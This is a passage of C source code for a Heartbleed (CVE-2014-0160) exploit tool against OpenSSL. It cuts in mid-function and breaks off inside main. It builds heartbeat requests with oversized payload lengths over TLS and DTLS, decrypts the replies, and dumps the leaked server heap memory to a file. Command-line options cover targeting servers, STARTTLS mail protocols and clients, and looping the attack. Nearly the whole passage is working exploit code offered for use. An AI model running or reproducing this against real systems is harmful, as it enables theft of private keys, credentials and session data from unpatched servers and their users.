read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t\tsend(sd,line2,strlen(line2),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nvoid* heartbleed(connection *c,unsigned int type){\r\n\tunsigned char *buf, *p;\r\n int ret;\r\n\tbuf = OPENSSL_malloc(1 + 2);\r\n\tif(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tp = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n\tswitch(type){\r\n\t\tcase 0:\r\n\t\t\ts2n(0x0,p);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\ts2n(0xffff,p);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tprintf("[ setting heartbeat payload_length to %u\\n",type);\r\n\t\t\ts2n(type,p);\r\n\t\t\tbreak;\r\n\t}\r\n\tprintf("[ <3 <3 <3 heart bleed <3 <3 <3\\n");\r\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\r\n OPENSSL_free(buf);\r\n\treturn c;\r\n}\r\n\r\nvoid* dtlsheartbleed(connection *c,unsigned int type){\r\n\r\n\tunsigned char *buf, *p;\r\n int ret;\r\n\tbuf = OPENSSL_malloc(1 + 2 + 16);\r\n\tmemset(buf, '\\0', sizeof buf);\r\n\tif(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tp = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n\tswitch(type){\r\n\t\tcase 0:\r\n\t\t\ts2n(0x0,p);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n//\t\t\ts2n(0xffff,p);\r\n//\t\t\ts2n(0x3feb,p);\r\n\t\t\ts2n(0x0538,p);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tprintf("[ setting heartbeat payload_length to %u\\n",type);\r\n\t\t\ts2n(type,p);\r\n\t\t\tbreak;\r\n\t}\r\n\ts2n(c->sslHandle->tlsext_hb_seq, p);\r\n\tprintf("[ <3 <3 <3 heart bleed <3 <3 <3\\n");\r\n\r\n ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);\r\n\r\n\tif (ret >= 0)\r\n\t\t{\r\n\t\tif (c->sslHandle->msg_callback)\r\n\t\t\tc->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT,\r\n\t\t\t\tbuf, 3 + 16,\r\n\t\t\t\tc->sslHandle, c->sslHandle->msg_callback_arg);\r\n\r\n\t\tdtls1_start_timer(c->sslHandle);\r\n\t\tc->sslHandle->tlsext_hb_pending = 1;\r\n\t\t}\r\n\r\n OPENSSL_free(buf);\r\n\r\n\treturn c;\r\n}\r\n\r\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\r\n\tchar *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n\tSSL* s;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned mac_size, orig_len;\r\n size_t extra;\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\r\n extra=SSL3_RT_MAX_EXTRA;\r\n else\r\n extra=0;\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple; \r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->length);\r\n\t\t\tif(rr->type==24){\r\n\t\t\t\tprintf("[ heartbeat returned type=%d length=%u\\n",rr->type, rr->length);\r\n\t\t\t\tif(rr->length > 16834){\r\n\t\t\t\t\tprintf("[ error: got a malformed TLS length.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse{\r\n\t\t\t\tprintf("[ incorrect record type=%d length=%u returned\\n",rr->type,rr->length);\r\n\t\t\t\ts->packet_length=0;\r\n\t\t\t\tbadpackets++;\r\n\t\t\t\tif(badpackets > 3){\r\n\t\t\t\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tgoto apple;\r\n\t\t\t}\r\n }\r\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple; \r\n }\r\n\tprintf("[ decrypting SSL packet\\n");\r\n s->rstate=SSL_ST_READ_HEADER; \r\n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n tls1_enc(s,0);\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n\tif(first==0){\r\n\t\tuint heartbleed_len = 0;\r\n\t\tchar* fp = s->s3->rrec.data;\r\n\t\t(long)fp++;\r\n\t\tmemcpy(&heartbleed_len,fp,2);\r\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n\t\tfirst = 2;\r\n\t\tleakbytes = heartbleed_len + 16;\r\n\t\tprintf("[ heartbleed leaked length=%u\\n",heartbleed_len);\r\n\t}\r\n\tif(verbose==1){\r\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf("\\n");\r\n }\r\n\tleakbytes-=rr->length;\r\n\tif(leakbytes > 0){\r\n\t\trepeat = 1;\r\n\t}\r\n\telse{\r\n\t\trepeat = 0;\r\n\t}\r\n\tprintf("[ final record type=%d, length=%u\\n", rr->type, rr->length);\r\n\tint output = s->s3->rrec.length-3;\r\n\tif(output > 0){\r\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n\t if(first==2){\r\n\t\t\tfirst--;\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\t/* first three bytes are resp+len */\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length-3,filename);\r\n\t\t}\r\n\t\telse{\r\n\t\t\t/* heap data & 16 bytes padding */\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length,filename);\r\n\t\t}\r\n\t\tclose(fd);\r\n\t}\r\n\telse{\r\n\t\tprintf("[ nothing from the heap to write\\n");\r\n\t}\r\n\treturn;\r\napple:\r\n printf("[ problem handling SSL record packet - wrong type?\\n");\r\n\tbadpackets++;\r\n\tif(badpackets > 3){\r\n\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\n\r\nvoid* dtlssneakyleaky(connection *c,char* filename, int verbose){\r\n\tchar *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n\tSSL* s;\r\n\tDTLS1_BITMAP *bitmap;\r\n\tunsigned int is_next_epoch;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned int mac_size, orig_len;\r\n\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n\r\nagain:\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < DTLS1_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple; \r\n\r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n\t\t\tn2s(p,rr->epoch);\r\n\t\t\tmemcpy(&(s->s3->read_sequence[2]), p, 6);\r\n\t\t\tp+=6;\r\n n2s(p,rr->length);\r\n\t\t\tif(rr->type==24){\r\n\t\t\t\tprintf("[ heartbeat returned type=%d length=%u\\n",rr->type, rr->length);\r\n\t\t\t\tif(rr->length > 16834){\r\n\t\t\t\t\tprintf("[ error: got a malformed TLS length.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse{\r\n\t\t\t\tprintf("[ incorrect record type=%d length=%u returned\\n",rr->type,rr->length);\r\n\t\t\t\ts->packet_length=0;\r\n\t\t\t\tbadpackets++;\r\n\t\t\t\tif(badpackets > 3){\r\n\t\t\t\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tgoto apple;\r\n\t\t\t}\r\n }\r\n\r\n if (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple; \r\n }\r\n\t\tif ( n != i)\r\n\t\t\t{\r\n\t\t\trr->length = 0;\r\n\t\t\ts->packet_length = 0;\r\n\t\t\tgoto again;\r\n\t\t\t}\r\n\tprintf("[ decrypting SSL packet\\n");\r\n s->rstate=SSL_ST_READ_HEADER; \r\n\r\n\tbitmap = dtls1_get_bitmap(s, rr, &is_next_epoch);\r\n\tif ( bitmap == NULL)\r\n\t\t{\r\n\t\trr->length = 0;\r\n\t\ts->packet_length = 0;\r\n\t\tgoto again;\r\n\t\t}\r\n\r\n\t\tif (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE &&\r\n\t\t *p == SSL3_MT_CLIENT_HELLO) &&\r\n\t\t !dtls1_record_replay_check(s, bitmap))\r\n\t\t\t{\r\n\t\t\trr->length = 0;\r\n\t\t\ts->packet_length=0;\r\n\t\t\tgoto again;\r\n\t\t\t}\r\n\r\n\tif (rr->length == 0) goto again;\r\nif (is_next_epoch)\r\n\t\t{\r\n\t\tif ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen)\r\n\t\t\t{\r\n\t\t\tdtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num);\r\n\t\t\t}\r\n\t\trr->length = 0;\r\n\t\ts->packet_length = 0;\r\n\t\tgoto again;\r\n\t\t}\r\n\r\n\r\n rr->input= &(s->packet[DTLS1_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n\torig_len=rr->length;\r\n\r\n dtls1_enc(s,0);\r\n\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n\tdtls1_record_bitmap_update(s, &(s->d1->bitmap));\r\n\tif(first==0){\r\n\t\tuint heartbleed_len = 0;\r\n\t\tchar* fp = s->s3->rrec.data;\r\n\t\t(long)fp++;\r\n\t\tmemcpy(&heartbleed_len,fp,2);\r\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n\t\tfirst = 2;\r\n\t\tleakbytes = heartbleed_len + 16;\r\n\t\tprintf("[ heartbleed leaked length=%u\\n",heartbleed_len);\r\n\t}\r\n\tif(verbose==1){\r\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf("\\n");\r\n }\r\n\tleakbytes-=rr->length;\r\n\tif(leakbytes > 0){\r\n\t\trepeat = 1;\r\n\t}\r\n\telse{\r\n\t\trepeat = 0;\r\n\t}\r\n\tprintf("[ final record type=%d, length=%u\\n", rr->type, rr->length);\r\n\tint output = s->s3->rrec.length-3;\r\n\tif(output > 0){\r\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n\t if(first==2){\r\n\t\t\tfirst--;\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\t/* first three bytes are resp+len */\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length-3,filename);\r\n\t\t}\r\n\t\telse{\r\n\t\t\t/* heap data & 16 bytes padding */\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length,filename);\r\n\t\t}\r\n\t\tclose(fd);\r\n\t}\r\n\telse{\r\n\t\tprintf("[ nothing from the heap to write\\n");\r\n\t}\r\n\r\n\t\t\tdtls1_stop_timer(c->sslHandle);\r\n\t\t\tc->sslHandle->tlsext_hb_seq++;\r\n\t\t\tc->sslHandle->tlsext_hb_pending = 0;\r\n\r\n\treturn;\r\napple:\r\n printf("[ problem handling SSL record packet - wrong type?\\n");\r\n\tbadpackets++;\r\n\tif(badpackets > 3){\r\n\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\nstatic DTLS1_BITMAP *\r\ndtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch)\r\n {\r\n \r\n *is_next_epoch = 0;\r\n\r\n if (rr->epoch == s->d1->r_epoch)\r\n return &s->d1->bitmap;\r\n\r\n else if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) &&\r\n (rr->type == SSL3_RT_HANDSHAKE ||\r\n rr->type == SSL3_RT_ALERT))\r\n {\r\n *is_next_epoch = 1;\r\n return &s->d1->next_bitmap;\r\n }\r\n\r\n return NULL;\r\n }\r\n\r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap)\r\n\t{\r\n\tint cmp;\r\n\tunsigned int shift;\r\n\tconst unsigned char *seq = s->s3->read_sequence;\r\n\r\n\tcmp = satsub64be(seq,bitmap->max_seq_num);\r\n\tif (cmp > 0)\r\n\t\t{\r\n\t\tmemcpy (s->s3->rrec.seq_num,seq,8);\r\n\t\treturn 1;\r\n\t\t}\r\n\tshift = -cmp;\r\n\tif (shift >= sizeof(bitmap->map)*8)\r\n\t\treturn 0;\r\n\telse if (bitmap->map & (1UL<<shift))\r\n\t\treturn 0;\r\n\r\n\tmemcpy (s->s3->rrec.seq_num,seq,8);\r\n\treturn 1;\r\n\t}\r\n\r\nint satsub64be(const unsigned char *v1,const unsigned char *v2)\r\n{\tint ret,sat,brw,i;\r\n\r\n\tif (sizeof(long) == 8) do\r\n\t{\tconst union { long one; char little; } is_endian = {1};\r\n\t\tlong l;\r\n\r\n\t\tif (is_endian.little)\t\t\tbreak;\r\n\r\n\t\tif (((size_t)v1|(size_t)v2)&0x7)\tbreak;\r\n\r\n\t\tl = *((long *)v1);\r\n\t\tl -= *((long *)v2);\r\n\t\tif (l>128)\t\treturn 128;\r\n\t\telse if (l<-128)\treturn -128;\r\n\t\telse\t\t\treturn (int)l;\r\n\t} while (0);\r\n\r\n\tret = (int)v1[7]-(int)v2[7];\r\n\tsat = 0;\r\n\tbrw = ret>>8;\r\n\tif (ret & 0x80)\r\n\t{\tfor (i=6;i>=0;i--)\r\n\t\t{\tbrw += (int)v1[i]-(int)v2[i];\r\n\t\t\tsat |= ~brw;\r\n\t\t\tbrw >>= 8;\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\tfor (i=6;i>=0;i--)\r\n\t\t{\tbrw += (int)v1[i]-(int)v2[i];\r\n\t\t\tsat |= brw;\r\n\t\t\tbrw >>= 8;\r\n\t\t}\r\n\t}\r\n\tbrw <<= 8;\r\n\r\n\tif (sat&0xff)\treturn brw | 0x80;\r\n\telse\t\treturn brw + (ret&0xFF);\r\n}\r\n\r\nstatic int\r\ndtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)\r\n\t{\r\n\tDTLS1_RECORD_DATA *rdata;\r\n\tpitem *item;\r\n\r\n\tif (pqueue_size(queue->q) >= 100)\r\n\t\treturn 0;\r\n\t\t\r\n\trdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));\r\n\titem = pitem_new(priority, rdata);\r\n\tif (rdata == NULL || item == NULL)\r\n\t\t{\r\n\t\tif (rdata != NULL) OPENSSL_free(rdata);\r\n\t\tif (item != NULL) pitem_free(item);\r\n\t\t\r\n\t\tSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n\t\treturn(0);\r\n\t\t}\r\n\t\r\n\trdata->packet = s->packet;\r\n\trdata->packet_length = s->packet_length;\r\n\tmemcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER));\r\n\tmemcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));\r\n\r\n\titem->data = rdata;\r\n\r\n#ifndef OPENSSL_NO_SCTP\r\n\tif (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&\r\n\t (s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) {\r\n\t\tBIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo);\r\n\t}\r\n#endif\r\n\r\n\tif (pqueue_insert(queue->q, item) == NULL)\r\n\t\t{\r\n\t\tOPENSSL_free(rdata);\r\n\t\tpitem_free(item);\r\n\t\treturn(0);\r\n\t\t}\r\n\r\n\ts->packet = NULL;\r\n\ts->packet_length = 0;\r\n\tmemset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER));\r\n\tmemset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));\r\n\t\r\n\tif (!ssl3_setup_buffers(s))\r\n\t\t{\r\n\t\tSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n\t\tOPENSSL_free(rdata);\r\n\t\tpitem_free(item);\r\n\t\treturn(0);\r\n\t\t}\r\n\t\r\n\treturn(1);\r\n\t}\r\n\r\n\r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)\r\n\t{\r\n\tint cmp;\r\n\tunsigned int shift;\r\n\tconst unsigned char *seq = s->s3->read_sequence;\r\n\r\n\tcmp = satsub64be(seq,bitmap->max_seq_num);\r\n\tif (cmp > 0)\r\n\t\t{\r\n\t\tshift = cmp;\r\n\t\tif (shift < sizeof(bitmap->map)*8)\r\n\t\t\tbitmap->map <<= shift, bitmap->map |= 1UL;\r\n\t\telse\r\n\t\t\tbitmap->map = 1UL;\r\n\t\tmemcpy(bitmap->max_seq_num,seq,8);\r\n\t\t}\r\n\telse\t{\r\n\t\tshift = -cmp;\r\n\t\tif (shift < sizeof(bitmap->map)*8)\r\n\t\t\tbitmap->map |= 1UL<<shift;\r\n\t\t}\r\n\t}\r\n\r\n\r\nvoid usage(){\r\n\tprintf("[\\n");\r\n\tprintf("[ --server|-s <ip/dns> - the server to target\\n");\r\n\tprintf("[ --port|-p <port> - the port to target\\n");\r\n\tprintf("[ --file|-f <filename> - file to write data to\\n");\r\n\tprintf("[ --bind|-b <ip> - bind to ip for exploiting clients\\n");\r\n\tprintf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n");\r\n\tprintf("[\t\t\t 0 = SMTP\\n");\r\n\tprintf("[\t\t\t 1 = POP3\\n");\r\n\tprintf("[\t\t\t 2 = IMAP\\n");\r\n\tprintf("[ --loop|-l\t\t - loop the exploit attempts\\n");\r\n\tprintf("[ --type|-t <n> - select exploit to try\\n");\r\n\tprintf("[ 0 = null length\\n");\r\n\tprintf("[\t\t\t 1 = max leak\\n");\r\n\tprintf("[\t\t\t n = heartbeat payload_length\\n");\r\n\tprintf("[ --udp|-u - use dtls/udp\\n");\r\n\tprintf("[\\n");\r\n\tprintf("[ --verbose|-v - output leak to screen\\n");\r\n\tprintf("[ --help|-h - this output\\n");\r\n\tprintf("[\\n");\r\n\texit(0);\r\n}\r\n\r\nint main(int argc, char* argv[]){\r\n\tint ret, port, userc, index;\r\n\tint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\r\n\tint loop = 0;\r\n\tstruct hostent *h;\r\n\tconnection* c;\r\n\tchar *host, *file;\r\n\tint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\r\n\tprintf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n");\r\n\tprintf("[ =============================================================\\n");\r\n static struct option options[] = {\r\n \t{"server", 1, 0, 's'},\r\n\t {"port", 1, 0, 'p'},\r\n\t\t{"file", 1, 0, 'f'},\r\n\t\t{"type", 1, 0, 't'},\r\n\t\t{"bind", 1, 0, 'b'},\r\n\t\t{"verbose", 0, 0, 'v'},\r\n\t\t{"precmd", 1, 0, 'c'},\r\n\t\t{"loop", 0, 0, 'l'},\r\n\t\t{"help", 0, 0,'h'},\r\n\t\t{"udp", 0, 0, 'u'}\r\n };\r\n\twhile(userc != -1) {\r\n\t userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvhu",options,&index);\t\r\n \tswitch(userc) {\r\n \t\tcase -1:\r\n\t break;\r\n \t case 's':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\th = gethostbyname(optarg);\t\t\t\t\r\n\t\t\t\t\tif(h==NULL){\r\n\t\t\t\t\t\tprintf("[!] FATAL: unknown host '%s'\\n",optarg);\r\n\t\t\t\t\t\texit(1);\r\n\t\t\t\t\t}\r\n\t\t\t\t\thost = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(host==NULL){\r\n \t\t\t\tprintf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n \t\t\t}\r\n\t\t\t\tbreak;\r\n\t case 'p':\r\n\t\t\t\tif(iport==0){\r\n\t\t\t\t\tport = atoi(optarg);\r\n\t\t\t\t\tiport = 1;\r\n\t\t\t\t}\r\n \t break;\r\n\t\t\tcase 'f':\r\n\t\t\t\tif(ifile==0){\r\n\t\t\t\t\tfile = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(file==NULL){\r\n\t\t\t\t printf("[ error in malloc()\\n");\r\n \t\t\t\texit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(file,"%s",optarg);\r\n\t\t\t\t\tifile = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 't':\r\n\t\t\t\tif(itype==0){\r\n\t\t\t\t\ttype = atoi(optarg);\r\n\t\t\t\t\titype = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'h':\r\n\t\t\t\tusage();\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'b':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\thost = malloc(strlen(optarg)+1);\r\n\t\t\t\t\tif(host==NULL){\r\n\t\t\t \t printf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n\t\t\t\t }\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n\t\t\t\t\tbind = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'c':\r\n\t\t\t\tif(iprecmd == 0){\r\n\t\t\t\t\tiprecmd = 1;\r\n\t\t\t\t\tprecmd = atoi(optarg);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'v':\r\n\t\t\t\tverbose = 1;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'l':\r\n\t\t\t\tloop = 1;\r\n\t\t\t\tbreak;\r\n \t case 'u':\r\n\t\t\t\tudp = 1;\r\n\t\t\t\tbreak;\r\n\r\n\t\t\tdefault:\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif(ihost==0||iport==0||ifile==0||itype==0){\r\n\t\tprintf("[ try --help\\n");\r\n\t\texit(0);\r\n\t}\r\n\tssl_init();\r\n\tif(bind==0){\r\n\t\tif (udp){\r\n\t\t\tc = dtls_client(ret, host, port);\r\n\t\t\tdtlsheartbleed(c, type);\r\n\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\twhile(repeat==1){\r\n\t\t\t\tdtlssneakyleaky(c,file,verbose);\r\n\t\t\t}\r\n\t\t\twhile(loop==1){\r\n\t\t\t\tprintf("[ entered heartbleed 